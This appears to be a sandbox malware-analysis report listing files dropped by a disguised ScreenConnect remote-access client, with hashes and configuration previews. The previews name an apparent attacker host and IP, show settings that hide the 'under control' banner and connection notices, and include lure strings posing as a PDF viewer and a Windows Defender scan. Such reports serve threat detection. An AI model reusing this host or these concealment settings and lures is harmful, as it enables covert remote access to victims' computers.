SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious
• Filename: E_BILL0041272508.exe, Detection: malicious
• Filename: Scan_PDF_5255303072.exe, Detection: malicious
• Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious
• Filename: Scan_PDF_2017163298.exe, Detection: malicious
• Filename: He6pI1bhcA.exe, Detection: malicious
• Filename: 5eRyCYRR9y.exe, Detection: malicious
• Filename: VD01NDHM8u.exe, Detection: malicious
• Filename: vovE92JSzK.exe, Detection: malicious
• Filename: s9POKY8U8k.exe, Detection: malicious
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                        Malicious:false
Preview:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <startup>
    <supportedRuntime version="v4.0" />
    <supportedRuntime version="v2.0.50727" />
  </startup>
  <runtime>
    <generatePublisherEvidence enabled="false" />
  </runtime>
</configuration>
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                                        Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                                        MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                                        SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                                        SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                                        SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):548864
                                                                                                                                                                                                                                                                        Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                                        MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                                        SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                                        SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                                        SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                                        Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                                        MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                                        SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                                        SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                                        SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):601376
                                                                                                                                                                                                                                                                        Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                                        MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                        SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                                        SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                                        SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                                        Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                                        MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                                        SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                                        SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                                        SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):464
                                                                                                                                                                                                                                                                        Entropy (8bit):4.856168973028116
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:rHy2DLI4MWozmO5OItfU49cA8RMZRCl13dMHcJRx74:zHE4uM2xbZRpkRxE
                                                                                                                                                                                                                                                                        MD5:0DCE7F0E2345982EE860DB000753DC67
                                                                                                                                                                                                                                                                        SHA1:18E27EF165824C1B852CDFD5B3A8687BEEA132F4
                                                                                                                                                                                                                                                                        SHA-256:351BF775962568F859E12870D992A899A09C3B5A780C7DDDAA49190D8001049E
                                                                                                                                                                                                                                                                        SHA-512:B37CA7117105A48D7A476513AE207EFE8BB0717FD95A0AAB8D6AE16F76D57F392FA68BA0F0C3170E30EBEABBE1D145E4A641904676D2A0FAF27A66DCF516666E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_Q2T}Z...5.......c...0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.L.....PDF Viewer.>Software is updating... Please do not turn off your computer!...Microsoft Windows Defender Scan
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):93109
                                                                                                                                                                                                                                                                        Entropy (8bit):7.9618781891916806
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:PuVZ7zoDDZuVZ7zoDDx7zoDDx7zoDDx7zoDDx7zoDDX:PGZ3CtGZ3Cl3Cl3Cl3Cl3C7
                                                                                                                                                                                                                                                                        MD5:764E92734733E81FA036A56EA784112F
                                                                                                                                                                                                                                                                        SHA1:1CE8D8DD183C43ADB38D8F6DEFC525CC093D08EC
                                                                                                                                                                                                                                                                        SHA-256:7108F7790C144DCD4BF81E49BAE5924CC3D1050DDF697F9EAE06E2A1AD95EB37
                                                                                                                                                                                                                                                                        SHA-512:031B163839D00EBEC6D335E53CBACCD8ADB0A25417A67780BE91827C20DFD25D0CE84F37E114FD3F4D8D1A3A54A35A73088E0AB744863BF45812E61CEFE8826F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):50133
                                                                                                                                                                                                                                                                        Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):26722
                                                                                                                                                                                                                                                                        Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1970
                                                                                                                                                                                                                                                                        Entropy (8bit):4.690426481732819
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                                                                                                                                                                                                        MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                                                                                                                                                                                                        SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                                                                                                                                                                                                        SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                                                                                                                                                                                                        SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):563
                                                                                                                                                                                                                                                                        Entropy (8bit):5.038578038992003
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpvhgQv/vXbAa3xT:2dL9hK6E46YPFV3vH
                                                                                                                                                                                                                                                                        MD5:798B6C387EFBFB8E358A934AAE04099A
                                                                                                                                                                                                                                                                        SHA1:041EFFE7ADEF3CA3CC117D657A255E7A468989B5
                                                                                                                                                                                                                                                                        SHA-256:721B738D47F154D32EF1284A2BA9ACCC68F49A83EC93A69FE488477EBF69027F
                                                                                                                                                                                                                                                                        SHA-512:E6369861086EFD343213C4BDD596AA76F53D8E55B9E513D1D2BE60DE25A2E9A77530A6ED6E1AE1C0163E1738D07FFEEA58A24DD7B2EA45E068EE0A685F75B86F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>ttyuio.zapto.org=178.215.236.119-02%2f10%2f2024%2004%3a23%3a15</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                                        Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                                        MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                                        SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                                        SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                                        SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1373
                                                                                                                                                                                                                                                                        Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                                        MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                                        SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                                        SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                                        SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):1662
                                                                                                                                                                                                                                                                        Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                                        MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                                        SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                                        SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                                        SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):847
                                                                                                                                                                                                                                                                        Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (623), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):15016
                                                                                                                                                                                                                                                                        Entropy (8bit):3.807193374964683
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:CjVqHzgjvUakjVqHzQbWyOIYIRjVqHzzIZx8jdLEv:YcCvUxc8bWyO3icvksdA
                                                                                                                                                                                                                                                                        MD5:1A13F6BBE1AFF7C669FC746D3633042D
                                                                                                                                                                                                                                                                        SHA1:5BBACA18C7BAD5E7AC5EC382A9A88FE836CF8DDD
                                                                                                                                                                                                                                                                        SHA-256:6831B4FD149564B4731C5523A061AADA34A02B15ED925D85C43DB6EA3926A95C
                                                                                                                                                                                                                                                                        SHA-512:55BB71D0B4392ED99B4CACC6CF890D13A7FA9E4A515D570470FD351AC73684D10F812DC8EAD40FCFAE1B3C40F94F3D1A7527BC1F9520D1D2DD8BF39F93367892
                                                                                                                                                                                                                                                                        Malicious:false
